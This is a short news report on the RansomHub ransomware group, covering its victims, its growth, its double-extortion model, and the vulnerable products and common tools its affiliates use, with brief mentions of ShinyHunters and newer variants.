Threat actors tied to the RansomHub ransomware group have reportedly encrypted and stolen data from over 210 victims since February 2024, according to the U.S. government.
The victims come from various industries, such as water and wastewater, IT, government, healthcare, emergency services, finance, manufacturing, transportation, and communication.
RansomHub, previously known as Cyclops and Knight, operates as a ransomware-as-a-service variant and has attracted high-profile affiliates from other well-known variants like LockBit and ALPHV, as per government reports.
The ransomware’s activity has been growing, accounting for 2% of all attacks in Q1 2024, 5.1% in Q2, and 14.2% in Q3, according to a recent analysis by ZeroFox.
Approximately one-third of RansomHub attacks have targeted European organizations, higher than the average for threats in the same landscape.
The group employs the double extortion model to steal data and encrypt systems, pressuring victims to pay a ransom. Those who refuse to comply have their information exposed on a data leak site.
RansomHub gains initial access by exploiting vulnerabilities in various software, including Apache ActiveMQ, Atlassian Confluence, Citrix ADC, F5 BIG-IP, Fortinet FortiOS, and Fortinet FortiClientEMS.
Affiliates then use reconnaissance tools like AngryIPScanner and Nmap to scan networks and disarm antivirus software to avoid detection.
The group then creates user accounts, escalates privileges, and moves laterally using different methods such as Remote Desktop Protocol, PsExec, and other command-and-control techniques.
RansomHub also accelerates encryption and exfiltration processes by using tools like PuTTY, WinSCP, and other methods.
In a separate development, Palo Alto Networks Unit 42 uncovered tactics used by the ShinyHunters ransomware, now focusing on extorting victims rather than selling stolen data. The group was first identified in 2020.
Ransomware attacks have evolved to include complex extortion strategies, such as triple and quadruple extortion schemes, aiming to cause additional disruption beyond encryption and data leakage.
New ransomware variants like Allarich, Cronus, CyberVolk, Datablack, DeathGrip, Hawk Eye, and Insom have emerged, attracting collaboration from Iranian nation-state actors.
